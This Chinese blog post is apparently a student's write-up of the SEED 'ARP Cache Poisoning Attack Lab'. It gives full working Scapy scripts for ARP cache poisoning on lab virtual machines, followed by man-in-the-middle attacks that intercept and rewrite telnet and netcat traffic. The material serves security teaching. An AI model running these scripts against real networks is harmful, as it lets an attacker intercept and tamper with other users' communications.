信息安全 SEED Lab11 ARP Cache Poisoning Attack Lab

最新推荐文章于 2022-11-20 01:03:52 发布
最新推荐文章于 2022-11-20 01:03:52 发布
阅读量2.9k 收藏 33
点赞数 3
分类专栏: 信息安全 文章标签: SEED 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mdzzname/article/details/118681704
版权

这部分主要是理解ARP协议和实施一些对ARP的攻击。
本地共有三台虚拟机,位于同一个子网下。地址如下:

NameMac AddressIP Address
A08:00:27:7e:82:5710.0.2.4
B08:00:27:34:bf:1e10.0.2.5
C08:00:27:62:26:6810.0.2.6

Task 1. ARP缓存投毒攻击

这部分主要是通过不同的方式实施ARP缓存投毒攻击。

Task 1A

这部分是通过ARP请求广播来实施ARP缓存投毒攻击。具体目标是我们通过A攻击C使得C的ARP缓存中B的IP地址对应的MAC地址是A的MAC地址。实现就是A在ARP请求中,使用A的MAC地址和B的IP地址,C收到请求后会进行缓存发送方的ip和mac映射。

先在 C机器上执行命令 sudo arp -d 10.0.2.5 清除C机器上的关于机器B的arp缓存。然后在A机器上执行下面的代码。

代码如下:

#!/usr/bin/python3
from scapy.all import *

broadcast_mac = "FF:FF:FF:FF:FF:FF"
# machine A
A_mac = "08:00:27:7e:82:57"
A_ip = "10.0.2.4"
# machine B
B_mac = "08:00:27:34:bf:1e"
B_ip = "10.0.2.5"
# machine C
C_mac = "08:00:27:62:26:68"
C_ip = "10.0.2.6"

E = Ether(src=A_mac, dst=broadcast_mac)
A = ARP(hwsrc=A_mac, psrc=B_ip, pdst=C_ip)
sendp(E/A)

查看 C机器的arp缓存如下, 可以看到IP为10.0.2.5(机器B)对应的MAC地址为08:00:27:7e:82:57(机器A的MAC地址),攻击完成。
在这里插入图片描述
wireshark记录如下:
在这里插入图片描述

Task 1B

这部分是通过ARP响应来实施ARP缓存投毒攻击。具体目标和task1A基本一样,都是通过A攻击C使得C的ARP缓存中B的IP地址对应的MAC地址是A的MAC地址。实现就是在ARP响应中发送方使用A的MAC地址和B的IP地址,接受方使用C的MAC地址和C的IP地址。

先在 C机器上执行命令 sudo arp -d 10.0.2.5 清除C机器上的关于机器B的arp缓存。然后在A机器上执行下面的代码。
代码如下:

#!/usr/bin/python3
from scapy.all import *

broadcast_mac = "FF:FF:FF:FF:FF:FF"
# machine A
A_mac = "08:00:27:7e:82:57"
A_ip = "10.0.2.4"
# machine B
B_mac = "08:00:27:34:bf:1e"
B_ip = "10.0.2.5"
# machine C
C_mac = "08:00:27:62:26:68"
C_ip = "10.0.2.6"

E = Ether(src=A_mac, dst=C_mac)
# op=2 implies a arp reply
A = ARP(hwsrc=A_mac, psrc=B_ip, hwdst=C_mac, pdst=C_ip, op=2)
sendp(E/A)

查看 C机器的arp缓存如下, 可以看到IP为10.0.2.5(机器B)对应的MAC地址为08:00:27:7e:82:57(机器A的MAC地址),攻击完成。
在这里插入图片描述
wireshark记录如下:
在这里插入图片描述

Task 1C

这部分是通过ARP免费报文来实施ARP缓存投毒攻击。免费ARP报文是一种特殊的ARP报文,该报文携带的发送端IP地址和目标IP地址都是本机地址,报文源MAC地址是本机地址,目的MAC地址是广播地址,以太网头中的目的MAC地址也是广播地址。

设备通过对外发送免费ARP报文来实现以下功能:

  1. 确定其它设备的IP地址是否与本机的IP地址冲突。当其它设备收到免费ARP报文后,如果发现报文中的IP地址和自己的IP地址相同,则给发送免费ARP报文的设备返回一个ARP应答,告知该设备IP地址冲突。

  2. 设备改变了硬件地址,通过发送免费ARP报文通知其它设备更新ARP表项。

这部分我们的具体目标和task1A基本一样,都是通过A攻击C使得C的ARP缓存中B的IP地址对应的MAC地址是A的MAC地址。实现就是在ARP免费报文中发送方使用A的MAC地址和B的IP地址即可。

先在 C机器上执行命令 sudo arp -d 10.0.2.5 清除C机器上的关于机器B的arp缓存。然后在A机器上执行下面的代码。
代码如下:

#!/usr/bin/python3
from scapy.all import *

broadcast_mac = "FF:FF:FF:FF:FF:FF"
# machine A
A_mac = "08:00:27:7e:82:57"
A_ip = "10.0.2.4"
# machine B
B_mac = "08:00:27:34:bf:1e"
B_ip = "10.0.2.5"
# machine C
C_mac = "08:00:27:62:26:68"
C_ip = "10.0.2.6"

E = Ether(src=A_mac, dst=broadcast_mac)
# op=2 implies a arp reply
A = ARP(hwsrc=A_mac, psrc=B_ip, hwdst=broadcast_mac, pdst=B_ip)
sendp(E/A)

查看 C机器的arp缓存如下, 可以看到IP为10.0.2.5(机器B)对应的MAC地址为08:00:27:7e:82:57(机器A的MAC地址),攻击完成。
在这里插入图片描述
wireshark记录如下:
在这里插入图片描述

Task 2

这部分主要是通过ARP缓存投毒来对telnet实施中间人攻击。示意图如下:
在这里插入图片描述
这部分我们使用A作为攻击者,即作为中间人去监听B和C之间的通信。 共分为以下几步:

Step 1 先实施ARP缓存投毒

要实施中间人攻击,就必须先让B和C之间的数据包经过攻击者。这部分我们可以用ARP缓存投毒,具体效果可以参考Task 1.

ARP缓存投毒有多种实现方法,这里我们采用Task1A中的方法实现,即通过ARP请求来实现。具体代码如下:

#!/usr/bin/python3
from scapy.all import *

broadcast_mac = "FF:FF:FF:FF:FF:FF"
# machine A
A_mac = "08:00:27:7e:82:57"
A_ip = "10.0.2.4"
# machine B
B_mac = "08:00:27:34:bf:1e"
B_ip = "10.0.2.5"
# machine C
C_mac = "08:00:27:62:26:68"
C_ip = "10.0.2.6"

# attack machine B
E = Ether(src=A_mac, dst=broadcast_mac)
A = ARP(hwsrc=A_mac, psrc=C_ip, pdst=B_ip)
sendp(E/A)
# attack machine C
E = Ether(src=A_mac, dst=broadcast_mac)
A = ARP(hwsrc=A_mac, psrc=B_ip, pdst=C_ip)
sendp(E/A)

在B机器上使用sudo arp -d 10.0.2.6删除B机器上的关于机器C的arp缓存,在C机器上使用sudo arp -d 10.0.2.5删除C机器上的关于机器B的arp缓存。

在A机器上运行上面的代码。

查看 B机器的arp缓存如下, 可以看到IP为10.0.2.6(机器C)对应的MAC地址为08:00:27:7e:82:57(机器A的MAC地址)。
在这里插入图片描述
查看 C机器的arp缓存如下, 可以看到IP为10.0.2.5(机器B)对应的MAC地址为08:00:27:7e:82:57(机器A的MAC地址)。
在这里插入图片描述
至此,我们将B机器上C的IP地址的ARP缓存指向了A的MAC地址,C机器上B的IP地址的ARP缓存指向了A的MAC地址,攻击完成。

Step 2 测试

上面我们完成了攻击,这里我们在B机器上ping C机器,在C机器上ping B机器测试一下。

下图是在B机器上ping C机器,可以看到是ping不通的,同理在C机器上ping B机器也是ping不通的。
在这里插入图片描述
原因如下:以在B机器上ping C机器为例, 发送的icmp包链路层本应该是机器C的ip对应的MAC地址,但是由于ARP中毒攻击,缓存中机器C的ip对应的MAC地址是机器A的MAC地址,而IP层的目的地址是机器C的IP地址。所以机器A收到这个包,看到包中的目的MAC地址与自己的一样,会收下来,但是IP层的目的IP是机器C的IP地址,与自己的对不上,会丢弃该包。
机器C看到包中的目的MAC地址与自己的不一样,不会收,所以ping失败。

Step 3 打开系统数据包转发

使用下面的命令在A机器上打开数据包转发功能。所谓转发即当主机拥有多于一块的网卡时,其中一块收到数据包,根据数据包的目的ip地址将数据包发往本机另一块网卡,该网卡根据路由表继续发送数据包。这通常是路由器所要实现的功能。

sudo sysctl net.ipv4.ip_forward=1

打开后再次测试可以发现从机器B可以ping通机器C了。
在这里插入图片描述
原因就是系统开启了类似路由的转发功能,以请求为例,第一个包如下,IP层是机器B -> 机器C,由于ARP缓存中毒,链路层是机器B -> 机器A
在这里插入图片描述
然后转发开始起作用。机器A收到包后修改链路层的MAC地址,目的MAC为机器C的MAC地址,源MAC为自己的MAC地址。
所以IP层是机器B -> 机器C不变,但是链路层变成机器A -> 机器C
在这里插入图片描述
这样C就能收到正确的icmp报文了。同理C的响应也是按照上面的步骤进行,响应先发给A,A再转发给B。

机器A在整个过程中就和一台路由器一样,完成包的转发工作。

Step 4 实施中间人攻击

最后就是实施攻击了。

Step 4.1

我们先在机器A上打开包转发功能,然后在机器B上telnet机器C,输入用户名密码,可以连上,可以正常输入命令并返回结果。然后在机器A上关闭包转发功能,再输入命令,可以发现无法输入,因为此时关闭包转发后,机器B和机器C已经无法通信,原因见Step 2分析,如下所示,无法输入。
在这里插入图片描述

Step 4.2

下面进行攻击。攻击的思路就是如Step 4.1中一样,先用ARP缓存中毒攻击机器B和机器C,然后在机器A上打开包转发。这时候机器B可以通过telnet和机器C建立通信。建立连接后在机器A上关闭包转发,运行我们的发包程序即可。虽然这时机器B不能直接和机器C通信,但是它发给机器C的包都发给机器A,机器A略作修改后即可发送给机器C。

先不修改数据包,使用的代码如下:

#!/usr/bin/python3
from scapy.all import *

VM_B_IP = "10.0.2.5"
VM_C_IP = "10.0.2.6"

def spoof_pkt(pkt):
    if pkt[IP].src == VM_B_IP and pkt[IP].dst == VM_C_IP and pkt[TCP].payload:
        # Create a new packet based on the captured one.
        # (1) We need to delete the checksum fields in the IP and TCP headers,
        # because our modification will make them invalid.
        # Scapy will recalculate them for us if these fields are missing.
        # (2) We also delete the original TCP payload.
        newpkt = IP(pkt[IP])
        del(newpkt.chksum)
        del(newpkt[TCP].chksum)
        del(newpkt[TCP].payload)
        #####################################################################
        # Construct the new payload based on the old payload.
        # Students need to implement this part.
        olddata = pkt[TCP].payload.load # Get the original payload data
        newdata = olddata # No change is made in this sample code
        #####################################################################
        # Attach the new data and set the packet out
        send(newpkt/newdata)
    elif pkt[IP].src == VM_C_IP and pkt[IP].dst == VM_B_IP:
        send(pkt[IP]) # Forward the original packet

# capture pkt of which sender is not machine A
pkt = sniff(filter="ether src host not 08:00:27:7e:82:57 and tcp",prn=spoof_pkt)

按上面操作,结果如下,可以看到机器A上包转发已关闭
在这里插入图片描述

机器B上的结果如下,可以看到攻击后,telnet可以正常运行命令并输出结果,下图是输入ifconfig命令后,输出了机器C上的网卡和地址信息,右边是机器B本地shell的输出结果。这说明攻击正常工作。
在这里插入图片描述
下面尝试修改中间通信的数据包,这里我们简单将机器B发送的命令中的每个字符修改为z。代码如下:

#!/usr/bin/python3
from scapy.all import *

VM_B_IP = "10.0.2.5"
VM_C_IP = "10.0.2.6"

def spoof_pkt(pkt):
    if pkt[IP].src == VM_B_IP and pkt[IP].dst == VM_C_IP and pkt[TCP].payload:
        # Create a new packet based on the captured one.
        # (1) We need to delete the checksum fields in the IP and TCP headers,
        # because our modification will make them invalid.
        # Scapy will recalculate them for us if these fields are missing.
        # (2) We also delete the original TCP payload.
        newpkt = IP(pkt[IP])
        del(newpkt.chksum)
        del(newpkt[TCP].chksum)
        del(newpkt[TCP].payload)
        #####################################################################
        # Construct the new payload based on the old payload.
        # Students need to implement this part.
        olddata = pkt[TCP].payload.load # Get the original payload data
        newdata = "z" * len(olddata) # No change is made in this sample code
        #####################################################################
        # Attach the new data and set the packet out
        send(newpkt/newdata)
    elif pkt[IP].src == VM_C_IP and pkt[IP].dst == VM_B_IP:
        send(pkt[IP]) # Forward the original packet

# capture pkt of which sender is not machine A
pkt = sniff(filter="ether src host not 08:00:27:7e:82:57 and tcp",prn=spoof_pkt)

结果如下,无论输入什么,都会显示z,即使回车,这会使得无法执行命令。因为在telnet中,一般你一输入一个字符,就会发一个包。当你输入非常快时,可能会一个包带多个字符。发送过去的数据server端会返回给client,client会显示在终端上。上面我们全替换为z,显示在client上的也全部是z。
在这里插入图片描述
略修改下,不替换回车,代码如下:

#!/usr/bin/python3
from scapy.all import *

VM_B_IP = "10.0.2.5"
VM_C_IP = "10.0.2.6"

def spoof_pkt(pkt):
    if pkt[IP].src == VM_B_IP and pkt[IP].dst == VM_C_IP and pkt[TCP].payload:
        # Create a new packet based on the captured one.
        # (1) We need to delete the checksum fields in the IP and TCP headers,
        # because our modification will make them invalid.
        # Scapy will recalculate them for us if these fields are missing.
        # (2) We also delete the original TCP payload.
        newpkt = IP(bytes(pkt[IP]))
        del(newpkt.chksum)
        del(newpkt[TCP].chksum)
        del(newpkt[TCP].payload)
        #####################################################################
        # Construct the new payload based on the old payload.
        # Students need to implement this part.
        olddata = pkt[TCP].payload.load # Get the original payload data
        print("bytes: ", olddata)
        newdata = olddata.decode("ascii")
        print("content: ", newdata)
        tt = ""
        for v in newdata:
            tt += (v if v == '\r' else 'z')
        newdata = tt
        print("final: ", newdata)
        #####################################################################
        # Attach the new data and set the packet out
        send(newpkt/newdata)
    elif pkt[IP].src == VM_C_IP and pkt[IP].dst == VM_B_IP:
        send(pkt[IP]) # Forward the original packet

# capture pkt of which sender is not machine A
pkt = sniff(filter="ether src host not 08:00:27:7e:82:57 and tcp",prn=spoof_pkt)

结果如下,无论输入什么命令,都会变成全z,回车有效。
在这里插入图片描述

注意整个实验过程中,可能存在缓存中毒被破坏的情况,即机器B或C自己主动发ARP请求得到别人的真实地址的情况,这种情况下攻击可能会失效。解决办法是可以在机器A上定期发送ARP缓存中毒攻击,维持别的机器上的中毒ARP缓存。

Task 3.

这部分和task 2类似,只是对netcat实施中间人攻击。我们的任务是在netcat中输入包含我们名字的消息,攻击将名字的姓替换为同样长度的A。使用代码如下:

#!/usr/bin/python3
from scapy.all import *

VM_B_IP = "10.0.2.5"
VM_C_IP = "10.0.2.6"

def spoof_pkt(pkt):
    if pkt[IP].src == VM_B_IP and pkt[IP].dst == VM_C_IP and pkt[TCP].payload:
        # Create a new packet based on the captured one.
        # (1) We need to delete the checksum fields in the IP and TCP headers,
        # because our modification will make them invalid.
        # Scapy will recalculate them for us if these fields are missing.
        # (2) We also delete the original TCP payload.
        newpkt = IP(bytes(pkt[IP]))
        del(newpkt.chksum)
        del(newpkt[TCP].chksum)
        del(newpkt[TCP].payload)
        #####################################################################
        # Construct the new payload based on the old payload.
        # Students need to implement this part.
        olddata = pkt[TCP].payload.load # Get the original payload data
        oldstr = olddata.decode("ascii")
        newdata = oldstr.replace("Liu", "AAA")

        #####################################################################
        # Attach the new data and set the packet out
        send(newpkt/newdata)
    elif pkt[IP].src == VM_C_IP and pkt[IP].dst == VM_B_IP:
        send(pkt[IP]) # Forward the original packet

# capture pkt of which sender is not machine A
pkt = sniff(filter="ether src host not 08:00:27:7e:82:57 and tcp",prn=spoof_pkt)

具体操作和task 2类似。先在机器A上发动ARP缓存投毒,并开启转发包。在机器C上使用nc -l 9090监听9090端口,在机器B上使用nc 10.0.2.6 9090连接机器C的9090端口。连接成功后在机器A上关闭转发包并运行上面的代码。这时候可以在机器B上输入消息并观察机器C的输出。

机器B的输入如下:
在这里插入图片描述
机器C的输出如下:
在这里插入图片描述
可以看到,我们成功将名字中的姓改成AAA。

撒花完结!!!

mdzzname
关注
  • 3
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SeedLabARP Cache Poisoning Attack Lab
cold_windx的博客
08-29 1377
Attacker的主机上向HostA发送一则免费ARP,使HostA的ARP缓存中,HostB的IP地址被映射为Attacker的MAC地址。在Attacker的主机上向HostA发送一则ARP回复,使HostA的ARP缓存中,HostB的IP地址被映射为Attacker的MAC地址。接下来,我们清空掉HostA的ARP缓存,在尝试一遍攻击。在Attacker的主机上向HostA发送一则ARP请求,使HostA的ARP缓存中,HostB的IP地址被映射为Attacker的MAC地址。...
SEED-Lab) ARP Cache Poisoning Attack Lab
lunan的博客
02-17 6152
SEED-Lab) ARP Cache Poisoning Attack Lab 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录(SEED-Lab) ARP Cache Poisoning Attack Lab一、实验目标二、实验原理三、实验过程3.1 Task 1: ARP Cache Poisoning3.1.1 Task1A(using ARP request)3.1.2 Task 1B (using ARP reply)3.1.3 Task 1C (us
SEEDLab ARP Cache Poisoning Attack Lab 实验报告
C_Ronaldo__的博客
12-26 2241
文章目录实验过程实验环境一个小tipstask1:ARP Cache Poisoningtask 1A (using ARP request)task 1B (using ARP reply)结果分析:task 1C (using ARP gratuitous message)结果分析:实验总结 实验过程 实验环境 主机名 IP地址 MAC地址 M (攻击者) 10.0.2.4 08:00:27:E9:CF:F4 A (客户端) 10.0.2.5 08:00:27:40:49:4E
SeedLab3: ARP Cache Poisoning Attack Lab
Rachel_IS的博客
01-19 2808
来啦ARP Lab~ 有种复习Scapy的感觉,不过被官方代码坑到了( •́ㅿ•̀ ) Task 1 第一关就是试试ARP缓存毒害攻击 先发个ARP request康康 发之前是这样的,对应的就是真实MAC 发了之后成功替换(中间人的MAC就是下面那个) 然后再试试ARP reply行不行 效果一样滴 再发个gratuitous ARP康康效果 (这种ARP一般是用于开机的时候向同网段其他主机通告自己的MAC看看有没有冲突,或者是主机改变MAC时用于更新) 也很有效果 好了,能进行ARP欺骗
ARP Cache Poisoning
weixin_33826268的博客
07-31 504
... Similarly, if you are not surprised and perhaps somewhat concerned by the contents of this page, you probably need to read it again. Synopsis: Ethernet local area net...
tcpip实验指导书
05-26
这是一份TCPIP的实验指导书
ARP-Poison.rar_arp poisoning_attack_attack arp_poison
09-15
通过深入理解ARP协议和ARP Poisoning的工作原理,网络安全专业人员可以更好地保护网络免受此类攻击,并提高网络的安全性。同时,对于开发防御工具的程序员来说,了解攻击手段是至关重要的,以便编写出更有效的防护...
A Cache Poisoning Attack Targeting DNS Forwarding Devices
11-20
在本文中,我们提出了一个针对域名系统转发器的缓存中毒攻击。通过这种攻击,攻击者可以使用受控域注入任意受害域名的恶意记录,并绕过广泛部署的缓存中毒防御。通过对流行的家庭路由器模型和DNS软件进行测试,我们...
Towards Data Poisoning Attack against Knowledge Graph Embedding.pdf
08-09
To fill this gap, we propose a collection of data poisoning attack strategies, which can effectively manipulate the plausibility of arbitrary targeted facts in a knowledge graph by adding or deleting...
ARP_poisoning_detector:ARP中毒攻击的简单检测器
06-10
sudo python arp_poisoning_detector.py 输出示例 $ sudo python arp_poisoning_detector.py WARNING: No route found for IPv6 destination :: (no default route?) Init ARP : 192.168.1.254 = ab:cd:ef:98:76:...
漏洞挖掘——实验10 Return-to-libc Attack Lab
一半西瓜的博客
04-17 3787
题目 Lab Return-to-libc Attack Lab Pre 1、名词解释:ARP cache poisoning,ICMP Redirect Attack,SYN Flooding Attack,TCP Session Hijacking。如果想监听局域网内另外一台机器,一般先要进行什么步骤? 2、阅读下面这篇文章并且了解Netwox/Netwag的基本操作: Netwox...
漏洞挖掘——实验11 侧信道攻击+TCP/IP实验
一半西瓜的博客
04-17 5415
题目 Lab 侧信道攻击 + TCP/IP实验 Pre 1、用IE访问某些网站的时候,输入javascript:alert(document.cookie)会有什么反应,解释原因。 2、阅读下面两篇文章或者阅读一本书<<JavaScript DOM编程艺术>>: Javascript Tutorial https://www.evl.uic.edu/luc/bv...
SEED Labs信息安全实验
热门推荐
红蓝联盟的博客
07-04 1万+
1.1  SEED Labs 介绍    SEED Labs是一套完整的信息安全实验,涵盖本科信息安全教学中的大部分基本原理,可用于提高学生体验式学习的实验室练习。项目组2002年由杜文亮教授创建,目前开发了30个实验,涵盖了各种计算机安全概念,原理和实践,几百所大学已采用。实验楼翻译制作的SEEDLabs在线实验课永久免费并开源。    SEED Labs网站:http://www.cis.sy...
SeedLab】Packet Sniffing and Spoofing Lab
cold_windx的博客
08-24 3632
本节实验要求:借助Scapy库,实现网络流量的捕获与伪造。
信息安全 SEED Lab10 Packet Sniffing and Spoofing Lab
crazyliu的博客
07-07 5719
这个实验是关于数据包的嗅探与伪造 1. Task Set 1 这部分主要是利用工具来嗅探数据包,这里用的是 scapy。 可以用下面的命令进行安装。 sudo pip3 install scapy 简单测试一下,构造了一个IP数据包并打印其的一些信息 [07/02/21]seed@VM:~/.../Lab10$ sudo python3 Python 3.5.2 (default, Nov 17 2016, 17:05:23) [GCC 5.4.0 20160609] on linux Type "he
SEED2.0 ARP欺骗
qq_31699791的博客
11-20 739
SEED2.0 ARP欺骗攻击
中间人攻击-ARP中毒
weixin_43838889的博客
09-15 457
在上一章中,我们学习了网络扫描。 网络扫描是信息收集的一部分,它允许用户在本地网络中查找主机。 在本章中,我们将学习如何利用这些信息来攻击本地网络上的受害者。 我们将在本章中讨论以下主题: 为什么我们需要ARP? 构建 ARP 欺骗程序 监控流量 加密流量 手动恢复ARP表 解密网络流量 为什么我们需要ARP? 在前面的章节中,我们提到了地址解析协议是什么。在本章中,我们将更深入地研究它。在本地网络中,设备之间使用 MAC 地址而不是 IP 地址进行通信。这些也称为链路层地址。 ARP 是一种请求响应协
20155202张旭 Exp5 MSF基础应用
weixin_30443895的博客
04-20 131
20155202张旭 Exp5 MSF基础应用 实践内容 本次实验我使用的攻击方式: 1.针对office软件的主动攻击:——MS10-087: 2.MS10-002漏洞对浏览器攻击 3.针对客户端的攻击:Adobe Reader软件的渗透攻击——adobe_toolbutton 4.APR中间人窃听被动攻击的模块攻击: spoof/arp/arp_poisoning 5.Wget FTP软链接攻...
ARP协议攻击与防御 ARP欺骗
qq_45162687的博客
06-18 698
【目的】¶ 在本实验中,针对ARP协议无验证缺陷,进行ARP欺骗以实施中间人攻击,通过实验实现 熟悉ARP欺骗原理; 掌握中间人攻击原理。 【环境】¶ 根据提供的实验环境,OWASP节点和SeedUbuntu节点之间正常通行时数据包将不会经过Kali节点。攻击节点Kali将通过ARP欺骗成文中间人,从而截获SeedUbuntu和OWASP节点之间的数据包,并可对数据包内容进行篡改。 Se...
arp欺骗和arp攻击
最新发布
03-27
ARP欺骗(Address Resolution Protocol spoofing)也称ARP攻击(ARP poisoning),是一种利用ARP协议漏洞的网络攻击方式。ARP协议是用于解决IP地址和MAC地址之间的映射关系的协议,当一个主机需要发送数据时,会先查询目标主机的MAC地址,如果目标主机的MAC地址未知,则会广播ARP请求,请求目标主机回应其MAC地址。ARP欺骗攻击者会发送伪造的ARP响应,欺骗其他主机将攻击者的MAC地址误认为是目标主机的MAC地址,导致数据被发送到攻击者的主机上,攻击者可以窃取数据或进行中间人攻击等恶意行为。 为了防止ARP欺骗攻击,可以采取以下措施: 1. 使用静态ARP表:手动将IP地址和MAC地址进行绑定,避免使用ARP请求广播寻址。 2. 使用ARP防火墙:对于不合法的ARP请求进行过滤和阻止。 3. 使用加密协议:使用HTTPS等加密协议来加密数据,避免中间人攻击。 4. 使用网络入侵检测系统:对于异常的ARP请求进行检测和报警。 5. 定期更改密码:避免密码被窃取后被用于ARP欺骗攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值